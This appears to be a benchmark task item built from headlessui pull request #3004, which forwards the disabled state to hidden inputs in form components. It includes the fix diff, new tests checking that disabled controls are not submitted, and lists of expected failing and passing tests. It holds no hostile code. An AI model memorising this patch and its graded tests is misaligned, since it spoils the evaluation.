diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index 14cc2f7..1035c32 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -16,6 +16,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Add `hidden` attribute to internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) - Attempt form submission when pressing `Enter` on `Checkbox` component ([#2962](https://github.com/tailwindlabs/headlessui/pull/2962)) - Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) +- Forward `disabled` state to hidden inputs in form-like components ([#3004](https://github.com/tailwindlabs/headlessui/pull/3004)) ### Changed diff --git a/packages/@headlessui-react/src/components/checkbox/checkbox.tsx b/packages/@headlessui-react/src/components/checkbox/checkbox.tsx index aaa7ad2..c67e965 100644 --- a/packages/@headlessui-react/src/components/checkbox/checkbox.tsx +++ b/packages/@headlessui-react/src/components/checkbox/checkbox.tsx @@ -173,7 +173,12 @@ function CheckboxFn<TTag extends ElementType = typeof DEFAULT_CHECKBOX_TAG, TTyp return ( <> {name != null && ( - <FormFields data={checked ? { [name]: value || 'on' } : {}} form={form} onReset={reset} /> + <FormFields + disabled={disabled} + data={checked ? { [name]: value || 'on' } : {}} + form={form} + onReset={reset} + /> )} {render({ ourProps, diff --git a/packages/@headlessui-react/src/components/combobox/combobox.tsx b/packages/@headlessui-react/src/components/combobox/combobox.tsx index 8bfd8a7..7971322 100644 --- a/packages/@headlessui-react/src/components/combobox/combobox.tsx +++ b/packages/@headlessui-react/src/components/combobox/combobox.tsx @@ -907,6 +907,7 @@ function ComboboxFn<TValue, TTag extends ElementType = typeof DEFAULT_COMBOBOX_T > {name != null && ( <FormFields + disabled={disabled} data={value != null ? { [name]: value } : {}} form={form} onReset={reset} diff --git a/packages/@headlessui-react/src/components/listbox/listbox.tsx b/packages/@headlessui-react/src/components/listbox/listbox.tsx index 63f26e3..129dd74 100644 --- a/packages/@headlessui-react/src/components/listbox/listbox.tsx +++ b/packages/@headlessui-react/src/components/listbox/listbox.tsx @@ -670,7 +670,12 @@ function ListboxFn< })} > {name != null && value != null && ( - <FormFields data={{ [name]: value }} form={form} onReset={reset} /> + <FormFields + disabled={disabled} + data={{ [name]: value }} + form={form} + onReset={reset} + /> )} {render({ ourProps, diff --git a/packages/@headlessui-react/src/components/radio-group/radio-group.tsx b/packages/@headlessui-react/src/components/radio-group/radio-group.tsx index 2ab3a7a..2fabaa2 100644 --- a/packages/@headlessui-react/src/components/radio-group/radio-group.tsx +++ b/packages/@headlessui-react/src/components/radio-group/radio-group.tsx @@ -314,6 +314,7 @@ function RadioGroupFn<TTag extends ElementType = typeof DEFAULT_RADIO_GROUP_TAG, <RadioGroupDataContext.Provider value={radioGroupData}> {name != null && ( <FormFields + disabled={disabled} data={value != null ? { [name]: value || 'on' } : {}} form={form} onReset={reset} diff --git a/packages/@headlessui-react/src/components/switch/switch.tsx b/packages/@headlessui-react/src/components/switch/switch.tsx index 76a4ab8..eedf7a9 100644 --- a/packages/@headlessui-react/src/components/switch/switch.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.tsx @@ -237,7 +237,12 @@ function SwitchFn<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG>( return ( <> {name != null && ( - <FormFields data={checked ? { [name]: value || 'on' } : {}} form={form} onReset={reset} /> + <FormFields + disabled={disabled} + data={checked ? { [name]: value || 'on' } : {}} + form={form} + onReset={reset} + /> )} {render({ ourProps, theirProps, slot, defaultTag: DEFAULT_SWITCH_TAG, name: 'Switch' })} </> diff --git a/packages/@headlessui-react/src/internal/form-fields.tsx b/packages/@headlessui-react/src/internal/form-fields.tsx index 3592c57..ab94d98 100644 --- a/packages/@headlessui-react/src/internal/form-fields.tsx +++ b/packages/@headlessui-react/src/internal/form-fields.tsx @@ -31,10 +31,12 @@ export function HoistFormFields({ children }: React.PropsWithChildren<{}>) { export function FormFields({ data, form: formId, + disabled, onReset, }: { data: Record<string, any> form?: string + disabled?: boolean onReset?: (e: Event) => void }) { let [form, setForm] = useState<HTMLFormElement | null>(null) @@ -61,6 +63,7 @@ export function FormFields({ hidden: true, readOnly: true, form: formId, + disabled, name, value, })} diff --git a/packages/@headlessui-vue/CHANGELOG.md b/packages/@headlessui-vue/CHANGELOG.md index 25b14de..044bbd1 100644 --- a/packages/@headlessui-vue/CHANGELOG.md +++ b/packages/@headlessui-vue/CHANGELOG.md @@ -19,6 +19,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Don’t override explicit `disabled` prop for components inside `<MenuItem>` ([#2929](https://github.com/tailwindlabs/headlessui/pull/2929)) - Add `hidden` attribute to internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) - Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) +- Forward `disabled` state to hidden inputs in form-like components ([#3004](https://github.com/tailwindlabs/headlessui/pull/3004)) ## [1.7.19] - 2024-02-07 diff --git a/packages/@headlessui-vue/src/components/combobox/combobox.ts b/packages/@headlessui-vue/src/components/combobox/combobox.ts index 238c92e..e3e4cc3 100644 --- a/packages/@headlessui-vue/src/components/combobox/combobox.ts +++ b/packages/@headlessui-vue/src/components/combobox/combobox.ts @@ -735,6 +735,7 @@ export let Combobox = defineComponent({ hidden: true, readOnly: true, form, + disabled, name, value, }) diff --git a/packages/@headlessui-vue/src/components/listbox/listbox.ts b/packages/@headlessui-vue/src/components/listbox/listbox.ts index f49c438..20b1ce7 100644 --- a/packages/@headlessui-vue/src/components/listbox/listbox.ts +++ b/packages/@headlessui-vue/src/components/listbox/listbox.ts @@ -392,6 +392,7 @@ export let Listbox = defineComponent({ hidden: true, readOnly: true, form, + disabled, name, value, }) diff --git a/packages/@headlessui-vue/src/components/radio-group/radio-group.ts b/packages/@headlessui-vue/src/components/radio-group/radio-group.ts index 9bf8417..cd63c39 100644 --- a/packages/@headlessui-vue/src/components/radio-group/radio-group.ts +++ b/packages/@headlessui-vue/src/components/radio-group/radio-group.ts @@ -262,6 +262,7 @@ export let RadioGroup = defineComponent({ hidden: true, readOnly: true, form, + disabled, name, value, }) diff --git a/packages/@headlessui-vue/src/components/switch/switch.ts b/packages/@headlessui-vue/src/components/switch/switch.ts index 4746dee..239e0df 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.ts +++ b/packages/@headlessui-vue/src/components/switch/switch.ts @@ -78,6 +78,7 @@ export let Switch = defineComponent({ name: { type: String, optional: true }, value: { type: String, optional: true }, id: { type: String, default: () => `headlessui-switch-${useId()}` }, + disabled: { type: Boolean, default: false }, tabIndex: { type: Number, default: 0 }, }, inheritAttrs: false, @@ -172,6 +173,7 @@ export let Switch = defineComponent({ readOnly: true, checked: checked.value, form, + disabled: theirProps.disabled, name, value, })
Forward `disabled` state to hidden inputs in form-like components This PR fixes an issue where form-like components are disabled then the hidden input fields should be disabled as well otherwise they will be submitted to the form. We will now forward the `disabled` state to the hidden inputs. Fixes: #2988
**Title** Forward disabled state to hidden inputs in form‑like components **Problem** When a form‑like component (checkbox, combobox, listbox, radio group, switch) is disabled, its internally rendered hidden input remains enabled and is submitted with the form. This contradicts the expected HTML behavior where disabled fields are excluded from submission. **Root Cause** The hidden inputs were generated without considering the component’s `disabled` prop, so they were never disabled even when their parent component was. **Fix / Expected Behavior** - Propagate the component’s `disabled` flag to the hidden input elements. - Disabled components no longer contribute their values during form submission. - The form‑field helper now accepts and forwards a `disabled` option to the hidden inputs. - Behavior for enabled components remains unchanged. - Changes are applied consistently across both React and Vue implementations. **Risk & Validation** - Verify that disabling a component does not affect other attributes (e.g., `readOnly`, `hidden`). - Add tests to ensure hidden inputs are omitted from the submitted payload when disabled. - Run the full test suite and perform manual form submissions across supported browsers to confirm correct behavior.
3,004
tailwindlabs/headlessui
diff --git a/packages/@headlessui-react/src/components/combobox/combobox.test.tsx b/packages/@headlessui-react/src/components/combobox/combobox.test.tsx index 525f345..562a33e 100644 --- a/packages/@headlessui-react/src/components/combobox/combobox.test.tsx +++ b/packages/@headlessui-react/src/components/combobox/combobox.test.tsx @@ -5747,6 +5747,48 @@ describe('Form compatibility', () => { expect(submits).toHaveBeenLastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Combobox is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [value, setValue] = useState('home-delivery') + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Combobox value={value} onChange={setValue} name="delivery" disabled> + <Combobox.Input onChange={NOOP} /> + <Combobox.Button>Trigger</Combobox.Button> + <Combobox.Label>Pizza Delivery</Combobox.Label> + <Combobox.Options> + <Combobox.Option value="pickup">Pickup</Combobox.Option> + <Combobox.Option value="home-delivery">Home delivery</Combobox.Option> + <Combobox.Option value="dine-in">Dine in</Combobox.Option> + </Combobox.Options> + </Combobox> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Open combobox + await click(getComboboxButton()) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() let options = [ diff --git a/packages/@headlessui-react/src/components/listbox/listbox.test.tsx b/packages/@headlessui-react/src/components/listbox/listbox.test.tsx index acab326..b06c177 100644 --- a/packages/@headlessui-react/src/components/listbox/listbox.test.tsx +++ b/packages/@headlessui-react/src/components/listbox/listbox.test.tsx @@ -4670,6 +4670,47 @@ describe('Form compatibility', () => { expect(submits).toHaveBeenLastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Listbox is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [value, setValue] = useState('home-delivery') + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Listbox value={value} onChange={setValue} name="delivery" disabled> + <Listbox.Button>Trigger</Listbox.Button> + <Listbox.Label>Pizza Delivery</Listbox.Label> + <Listbox.Options> + <Listbox.Option value="pickup">Pickup</Listbox.Option> + <Listbox.Option value="home-delivery">Home delivery</Listbox.Option> + <Listbox.Option value="dine-in">Dine in</Listbox.Option> + </Listbox.Options> + </Listbox> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Open listbox + await click(getListboxButton()) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() let options = [ diff --git a/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx b/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx index 85f0fd4..436b2e3 100644 --- a/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx +++ b/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx @@ -1539,6 +1539,41 @@ describe('Form compatibility', () => { }) ) + it('should not submit the data if the RadioGroup is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [value, setValue] = useState('home-delivery') + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <RadioGroup value={value} onChange={setValue} name="delivery" disabled> + <RadioGroup.Label>Pizza Delivery</RadioGroup.Label> + <RadioGroup.Option value="pickup">Pickup</RadioGroup.Option> + <RadioGroup.Option value="home-delivery">Home delivery</RadioGroup.Option> + <RadioGroup.Option value="dine-in">Dine in</RadioGroup.Option> + </RadioGroup> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it( 'should be possible to submit a form with a complex value object', suppressConsoleLogs(async () => { diff --git a/packages/@headlessui-react/src/components/switch/switch.test.tsx b/packages/@headlessui-react/src/components/switch/switch.test.tsx index b6988f2..06d2c46 100644 --- a/packages/@headlessui-react/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.test.tsx @@ -810,4 +810,37 @@ describe('Form compatibility', () => { // Verify that the form has been submitted expect(submits).toHaveBeenLastCalledWith([['fruit', 'apple']]) }) + + it('should not submit the data if the Switch is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [state, setState] = useState(true) + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Switch.Group> + <Switch checked={state} onChange={setState} name="fruit" value="apple" disabled /> + <Switch.Label>Apple</Switch.Label> + </Switch.Group> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) }) diff --git a/packages/@headlessui-react/src/test-utils/scenarios.tsx b/packages/@headlessui-react/src/test-utils/scenarios.tsx index 31ee14f..c576a43 100644 --- a/packages/@headlessui-react/src/test-utils/scenarios.tsx +++ b/packages/@headlessui-react/src/test-utils/scenarios.tsx @@ -202,6 +202,35 @@ export function commonFormScenarios( expect(formDataMock.mock.calls[0][0].has('foo')).toBe(true) }) + it('should not submit the data if the control is disabled', async () => { + let submits = jest.fn() + + function Example() { + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Control name="bar" disabled /> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Submit the form + await click(screen.getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it( 'should reset the control when the form is reset', suppressConsoleLogs(async () => { diff --git a/packages/@headlessui-vue/src/components/combobox/combobox.test.ts b/packages/@headlessui-vue/src/components/combobox/combobox.test.ts index a3b638f..3222bf1 100644 --- a/packages/@headlessui-vue/src/components/combobox/combobox.test.ts +++ b/packages/@headlessui-vue/src/components/combobox/combobox.test.ts @@ -6146,6 +6146,49 @@ describe('Form compatibility', () => { expect(submits).lastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Combobox is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" name="foo" value="bar" /> + <Combobox v-model="value" name="delivery" disabled> + <ComboboxInput /> + <ComboboxButton>Trigger</ComboboxButton> + <ComboboxOptions> + <ComboboxOption value="pickup">Pickup</ComboboxOption> + <ComboboxOption value="home-delivery">Home delivery</ComboboxOption> + <ComboboxOption value="dine-in">Dine in</ComboboxOption> + </ComboboxOptions> + </Combobox> + <button>Submit</button> + </form> + `, + setup: () => { + let value = ref('home-delivery') + return { + value, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Open combobox + await click(getComboboxButton()) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() diff --git a/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx b/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx index 5beb32b..b09c3c3 100644 --- a/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx +++ b/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx @@ -5071,6 +5071,48 @@ describe('Form compatibility', () => { expect(submits).lastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Listbox is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" name="foo" value="bar" /> + <Listbox v-model="value" name="delivery" disabled> + <ListboxButton>Trigger</ListboxButton> + <ListboxOptions> + <ListboxOption value="pickup">Pickup</ListboxOption> + <ListboxOption value="home-delivery">Home delivery</ListboxOption> + <ListboxOption value="dine-in">Dine in</ListboxOption> + </ListboxOptions> + </Listbox> + <button>Submit</button> + </form> + `, + setup: () => { + let value = ref('home-delivery') + return { + value, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Open listbox + await click(getListboxButton()) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() diff --git a/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts b/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts index f491ae1..42d671a 100644 --- a/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts +++ b/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts @@ -1680,6 +1680,43 @@ describe('Form compatibility', () => { expect(submits).lastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the RadioGroup is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" name="foo" value="bar" /> + <RadioGroup v-model="value" name="delivery" disabled> + <RadioGroupLabel>Pizza Delivery</RadioGroupLabel> + <RadioGroupOption value="pickup">Pickup</RadioGroupOption> + <RadioGroupOption value="home-delivery">Home delivery</RadioGroupOption> + <RadioGroupOption value="dine-in">Dine in</RadioGroupOption> + </RadioGroup> + <button>Submit</button> + </form> + `, + setup: () => { + let value = ref('home-delivery') + return { + value, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() diff --git a/packages/@headlessui-vue/src/components/switch/switch.test.tsx b/packages/@headlessui-vue/src/components/switch/switch.test.tsx index c4008b4..ce39576 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-vue/src/components/switch/switch.test.tsx @@ -929,4 +929,39 @@ describe('Form compatibility', () => { // Verify that the form has been submitted expect(submits).lastCalledWith([['fruit', 'apple']]) }) + + it('should not submit the data if the Switch is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" name="foo" value="bar" /> + <SwitchGroup> + <Switch v-model="checked" name="fruit" value="apple" disabled /> + <SwitchLabel>Apple</SwitchLabel> + </SwitchGroup> + <button>Submit</button> + </form> + `, + setup: () => { + let checked = ref(true) + return { + checked, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) })
[ "should not submit the data if the Switch is disabled", "should not submit the data if the RadioGroup is disabled", "should fire events in the correct order", "should not submit the data if the Listbox is disabled", "should transition in completely", "should transition out completely", "should transition in and out completely", "should not submit the data if the Combobox is disabled" ]
[ "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should be possible to transition", "should keep the delay time into account", "should be possible to cancel a transition at any time", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should wait the correct amount of time to finish a transition", "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "should be possible to use a LabelProvider without using a Label", "should be possible to use a LabelProvider and a single Label, and have them linked", "should be possible to use a LabelProvider and multiple Label components, and have them linked", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should not be possible to programmatically escape the focus trap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip \"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", "should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data output", "should encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should be possible to inert an element", "should mark the element as not inert anymore, once all references are gone", "should expose the correct components", "should not mark an element as inert when the hook is disabled", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should render a `Field` component", "should render a `Field` component with a render prop", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", "should be possible to change the underlying DOM node using the `as` prop and still have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", "should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a disclosure on click when the button is disabled", "should be possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should not submit the data if the control is disabled", "should reset the control when the form is reset", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be possible to toggle a checkbox by clicking it", "should be possible to use in an uncontrolled way", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible to render an (off) Switch using an `as` prop", "should be possible to use the switch contents as the label", "should have a default tabIndex of `0`", "should be possible to override the `tabIndex`", "should not be possible to override the `tabIndex` to `-1`", "should be possible to use in an uncontrolled way with a value", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should still call the onChange listeners when choosing new values", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label (passive)", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to put classes on a SwitchLabel", "should be possible to put classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active 